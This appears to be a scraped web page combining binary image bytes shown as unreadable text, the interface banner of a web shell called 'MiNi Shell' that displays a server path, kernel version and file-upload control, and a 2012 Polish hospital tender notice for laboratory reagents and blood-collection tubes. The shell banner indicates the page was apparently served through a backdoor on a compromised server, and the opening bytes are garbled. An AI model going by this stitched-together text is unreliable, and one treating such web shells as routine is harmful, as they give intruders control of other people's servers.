JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120306/52129-N-2012.html

<p class="kh_header"><b>Toruń: Dostawa odczynników do badań biochemicznych, materiałów do kontroli moczu, testów    screeningowych, testów met. ELISA, odczynników do oznaczeń met. chromatografii mikrokolumnowej, odczynników do analizatora Vidas PC, barwników i odczynników do analityki ogólnej i hematologii, zestawów do immunofiksacji, probówek do pobierania krwi włośniczkowej.</b><br>
<b>Numer ogłoszenia: 52129 - 2012; data zamieszczenia: 06.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. L. Rydygiera , ul. Św. Józefa 53/59, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6101510, faks 056 6596128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wszz.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa odczynników do badań biochemicznych, materiałów do kontroli moczu, testów    screeningowych, testów met. ELISA, odczynników do oznaczeń met. chromatografii mikrokolumnowej, odczynników do analizatora Vidas PC, barwników i odczynników do analityki ogólnej i hematologii, zestawów do immunofiksacji, probówek do pobierania krwi włośniczkowej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: <br>
- Zadanie Nr 1 - dostawa odczynników do badań biochemicznych, materiałów do kontroli moczu, testów screeningowych, testów met. ELISA:<br>
1. Odczynniki do badań biochemicznych, metody manualne - spektrofotometr, możliwość dostosowania do autom. analizatorów biochem., ciekłe, gotowe do użycia, z kalibratorami i kontrolami<br>
1.1 Etanol - met. enzymatyczna UV, kontrola min. 3 poziomy, 1 kontr./tydzień - 800 oznaczeń<br>
1.2 LDL - met. bezpośrednia, liniowość min. 400 mg/dl, kontrola, kalibrator, 1 kontr./tydzień - 5000 oznaczeń<br>
1.3 RF - met. ilościowa, liniowość do min. 500 IU/ml, kontrola min.2 poziomy ( materiał ciekły; stabilny po otwarciu co najmniej 60 dni), kalibrator min.4 poziomy, 1 kontr./tydzień - 3200 oznaczeń<br>
1.4 Cystatyna C, liniowość min. do 8 mg/l, z kalibratorami i kontrolą, 1 kontr./tydzień
- 1000 oznaczeń<br>
1.5 Wolny cholesterol - met. enzymatyczna z 4-aminoantypiryną, liniowość min. do 400 mg/dl, kontrola, kalibrator, 1 kontr./tydzień - 200 oznaczeń<br>
2. Materiały do kontroli moczu: kontrola właściwości fizykochemicznych i mikroskopowych moczu, materiał liofilizowany<br>
2.1 Mocz kontrolny patologiczny (wartości podwyższone), liofilizowany, 2 kontr./tydzień - 480 ml moczu kontrolnego<br>
2.2 Mocz kontrolny normalny (wartości w granicach normy), liofilizowany, 2 kontr./tydzień - 720 ml moczu kontrolnego<br>
3. Testy screeningowe<br>
3.1 Helicobacter Pylori Ag w kale, indywidualnie pakowane kasetki,  kompletne zestawy do pobierania i rozcieńczania próbek, brak efektu prozonowego, do stężenia białka H.pylorii wynoszącego 2,5mg/ml - 1600 oznaczeń<br>
3.2 FOB - test kasetkowy, bez konieczności stosowania specjalnej diety, czułość min. 40 ng/ml, brak efektu prozonowego do 0,5mg/ml, czułość większa lub równa 95%, swoistość większa lub równa 99% - 2000 oznaczeń<br>
3.3 SLE latex - 700 oznaczeń<br>
3.4 Mononukleoza - indywidualnie pakowane kasetki, czułość większa lub równa 99,9%, swoistość większa lub równa 98% - 600 oznaczeń<br>
3.5 Syphilis testy kasetkowe, met. 5 min. , kasetki pakowane indywidualnie - 240 oznaczeń<br>
3.6 Giardia Lamblia w kale, test kasetkowy, kasetki pakowane indywidualnie, czułość   większa lub równa 99%;  swoistość  większa lub równa 98% - 600 oznaczeń<br>
3.7 Test Waalera-Rose - 400 oznaczeń<br>
4. Testy met. ELISA<br>
4.1 Giardia Lamblia w kale, test 2-giej generacji, z użyciem przeciwciał monoklonalnych, limit detekcji 5 ng antygenu Giardia L./ml, pełny zestaw z kontrolami, max. 2 etapy płukania, brak reakcji krzyzowych z Ascaris lumbr., Rotavirus, Adenovirus - 2000 oznaczeń<br>
4.2 Progesteron 17-OH, z kalibratorami, kontrolą, ilościowy - 900 oznaczeń<br>

UWAGA:<br>
Podane ilości oznaczeń nie uwzględniają ilości kalibratorów i kontroli.<br>
Wykonawca na podstawie szacunkowej ilości oznaczeń zobowiązany jest określić niezbędną ilość pozycji do ich wykonywania takich jak:<br>
-materiały kalibracyjne<br>
-materiały kontrolne<br>
Zamawiający dopuszcza możliwość przeliczenia ceny wg oferowanych przez Wykonawcę opakowań pod warunkiem zachowania zamawianej ilości.<br><br>

- Zadanie Nr 2 - dostawa odczynników do oznaczeń met. chromatografii mikrokolumnowej:<br>
1. Odczynniki do oznaczeń met. chromatografii mikrokolumnowej<br>
1.1 17-Ketosteroidy, metoda chromatograficzno-spektrofotometryczna, zimmerman. Kompletny zestaw ze standardem. Opakowanie max. 40 ozn. - 480 oznaczeń<br>
1.2 17-Hydroksykortykosteroidy, metoda chromatograficzno-spektrofotometryczna, porter-silber. Kompletny zestaw ze standardem. Opakowanie max. 40 ozn. - 480 oznaczeń<br>
1.3 Kwas wanilino-migdałowy, metoda chromatograficzno-spektrofotometryczna. Kompletny zestaw ze standardem. Opakowanie max. 20 ozn. - 480 oznaczeń<br>
1.4 Mocz kontrolny do zestawów z poz. 1.1, 1.2, 1.3. - 400 ml<br>

UWAGA:<br>
Zamawiający dopuszcza możliwość przeliczenia ceny wg oferowanych przez Wykonawcę opakowań pod warunkiem zachowania zamawianej ilości.<br><br>

- Zadanie Nr 3 - odczynników do analizatora Vidas PC:<br>
1. Odczynniki do analizatora Vidas PC<br>
1.1 anty-Borrelia burgdorferi sl IgM, w surowicy - 1600 oznaczeń<br>
1.2 anty-Borrelia burgdorferi sl IgG, w surowicy i PMR - 1600 oznaczeń<br>

UWAGA:<br>
Zamawiający dopuszcza możliwość przeliczenia ceny wg oferowanych przez Wykonawcę opakowań pod warunkiem zachowania zamawianej ilości.<br><br>

- Zadanie Nr 4 - dostawa barwników i odczynników do analityki ogólnej i hematologii:<br>
1. Barwniki i odczynniki do analityki ogólnej i hematologii <br>
1.1 Roztwór Giemsy: charakterystyka spektr.: zakres absorb. dla lambda 1: 522-528nm, dla lambda 2: 649-654nm.; absorb. dla lambda 1>0,680nm, dla  lambda 2>1,250nm - 30000 ml<br>
1.2 Barwnik May-Grunwalda  charakterystyka spektr.: zakres absorb. dla lambda 1: 522-528nm, dla lambda 2: 652-656nm.; absorb. dla lambda 1>0,540nm, dla  lambda 2>1,080nm - 50000 ml<br>
1.3 Barwnik do retykulocytów (roztwór) - 2000 ml<br>
1.4 Odczynnik rozcieńczający barwnik Giemsy stężony (20x) - 10000 ml <br>
1.5 Odczynnik Samsona, op. max. 100ml - 600 ml <br>
1.6 Odczynnik Rosina, op. max. 100ml - 600 ml <br>
1.7 Odczynnik Nonne-Apelta max. 100ml - 600 ml <br>
1.8 Odczynnik Lugola 100 ml - 600 ml<br>

UWAGA:<br>
Zamawiający dopuszcza możliwość przeliczenia ceny wg oferowanych przez Wykonawcę opakowań pod warunkiem zachowania zamawianej ilości.<br><br>

- Zadanie Nr 5 - dostawa zestawów do immunofiksacji:<br>
1. Zestaw do immunofiksacji zawierający żele i niezbędne odczynniki oraz antysurowice (IgA, IgG, IgM oraz łańcuchy lekkie lambda i kappa ) do metod immunofiksacji  kompatybilne z komorą K20, aplikatorem i matrycą do nanoszenia anysurowic firmy Sebia. Zestawy pojedyncze - 600 oznaczeń<br>

UWAGA:<br>
Zamawiający dopuszcza możliwość przeliczenia ceny wg oferowanych przez Wykonawcę opakowań pod warunkiem zachowania zamawianej ilości.<br><br>

- Zadanie Nr 6 - dostawa probówek do pobierania krwi włośniczkowej:<br>

1. Probówki do pobierania krwi włośniczkowej<br>
1.1. Probówki do glukozy z przywieszanym korkiem, ok.300 ul z kapilarą (k.włośn.) - 50000 szt. <br>
1.2. Probówki ( surowica ) z przywieszanym korkiem, 200 - 300 ul z kapilarą (k.włośn.) - 60 000 szt. <br>
1.3. Probówki ( surowica ), z przywieszanym korkiem, 400 - 500 ul z kapilarą (k.włośn.) - 20 000 szt.<br>
1.4. Probówki z EDTA K2/K3, z przywieszanym korkiem, 200 - 300 ul z kapilarą (k.włośniczkowa) - 70 000 szt.<br>
1.5. Probówki do liczenia retikulocytów (krew żylna lub włośniczkowa) - 4 000 szt.<br>
1.6. Probówki do liczenia płytek krwi (krew żylna lub włośniczkowa) - 1000 szt.<br>

UWAGA: Zamawiający dopuszcza możliwość przeliczenia ceny wg oferowanych przez Wykonawcę opakowań pod warunkiem zachowania zamawianej ilości..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.69.62.00-7, 33.19.25.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/ wykaz wykonanych min. 2 dostaw odczynników dla zadań od Nr 1 do Nr 5 i min. 2 dostaw sprzętu laboratoryjnego dla zadania Nr 6 o wartości min. dla poszczególnych zadań:
      - Zadanie Nr 1 -    30.000,00 zł,
	      - Zadanie Nr 2 -    23.400,00 zł,
     - Zadanie Nr 3 -    22.800,00 zł,
	     -  Zadanie Nr 4 -      3.180,00 zł,
      - Zadanie Nr 5 -    16.200,00 zł,
	      - Zadanie Nr 6 -    28.200,00 zł,
brutto każda dostawa w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia min. 2 dokumentów potwierdzających, że te dostawy zostały wykonane należycie;

Wykonawca składający ofertę na kilka zadań musi wykazać się zrealizowanymi min. 2 dostawami o wymaganej wartości łącznej równej sumie poszczególnych zadań, których dotyczy oferta np. Wykonawca składający ofertę na zad. Nr 1 i Nr 2 musi wykazać się zrealizowanymi 2 dostawami
o wymaganej wartości łącznej równej sumie 53.400,00 zł każda dostawa.

Jeżeli Wykonawca wykazując spełnianie tego warunku polegać będzie na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda przedstawienia w odniesieniu do tych podmiotów dokumentów stwierdzających, że do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 pkt 2 ustawy - Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/	informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy do min. kwoty dla poszczególnych zadań:
	- Zadanie Nr 1 -    25.000,00 zł,
	- Zadanie Nr 2 -    19.500,00 zł,
- Zadanie Nr 3 -    19.000,00 zł,
	- Zadanie Nr 4 -     2.650,00 zł,
- Zadanie Nr 5 -   13.500,00 zł,
	- Zadanie Nr 6 -   23.500,00 zł

 wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
/ Informacja banku mówiąca tylko o obrotach na rachunku Wykonawcy nie spełni warunku         udziału/.

      Wykonawca składający ofertę np. na Zadanie Nr 1 i Nr 2 musi załączyć do oferty informację banku lub spółdzielczej kasy oszczędnościowo- kredytowej o wymaganej wartości łącznej równej sumie 44.500,00 zł.

      Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2 b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

      Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">zgłoszenie/powiadomienie Prezesa Urzędu o wprowadzeniu do obrotu i do używania oferowanego wyrobu zgodnie z ustawą z dnia 20 maja 2010 r. o wyrobach medycznych (Dz. U. z 2010 r. Nr 107, poz. 679) i Rozporządzenia Ministra Zdrowia z dnia 12 stycznia 2011 r. w sprawie wymagań zasadniczych oraz procedur oceny zgodności wyrobów medycznych do diagnostyki in vitro, certyfikat jednostki notyfikowanej potwierdzającej przeprowadzenie procedury oceny zgodności wyrobu z wymaganiami zasadniczymi.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a/	oświadczenia o braku podstaw do wykluczenia zgodnie z załącznikiem Nr 5 do SIWZ;
b/ Oświadczenia o spełnianiu warunków udziału zgodnie z załącznikiem Nr 6 do SIWZ.

* Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie i według formuły: spełnia/nie spełnia. Zamawiający na podstawie złożonych wraz z ofertą dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonych przez Zamawiającego warunków.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość aneksowania terminu obowiązywania umowy w przypadku niezrealizowania jej pod względem ilościowym w obowiązującym terminie umownym. <br>

2. Ceny podane w ofercie będą obowiązywać przez okres trwania umowy, a w przypadku zmiany obowiązującej stawki podatku VAT w okresie trwania umowy Wykonawca ma prawo doliczyć do cen netto ustalonych w umowie należny podatek VAT według obowiązującej stawki. Zmiana ta nie będzie wymagała aneksu.<br>

3. Strony dopuszczają możliwość zmiany umowy w przypadku:
1. zmiany numeru katalogowego produktu, <br>
2. zmiany nazwy produktu przy zachowaniu jego parametrów,<br>
3. sposobu konfekcjonowania,<br>
4. jeżeli wprowadzony zostanie do sprzedaży przez Wykonawcę produkt zmodyfikowany, udoskonalony.<br>
   z zastrzeżeniem, że nie ulegną zmianie ceny umowne.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wszz.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.wszz.torun.pl lub Wojewódzki Szpital Zespolony im. Ludwika Rydygiera ul. Św. Józefa 53/59, 87- 100 Toruń, Dział Zamówień Publicznych- pokój nr 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.03.2012 godzina 09:00, miejsce: Kancelaria
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera
ul. Św. Józefa 53/59, 87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1 - dostawa odczynników do badań biochemicznych, materiałów do kontroli moczu, testów screeningowych, testów met. ELISA..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Odczynniki do badań biochemicznych, metody manualne - spektrofotometr, możliwość dostosowania do autom. analizatorów biochem., ciekłe, gotowe do użycia, z kalibratorami i kontrolami<br>
1.1 Etanol - met. enzymatyczna UV, kontrola min. 3 poziomy, 1 kontr./tydzień - 800 oznaczeń<br>
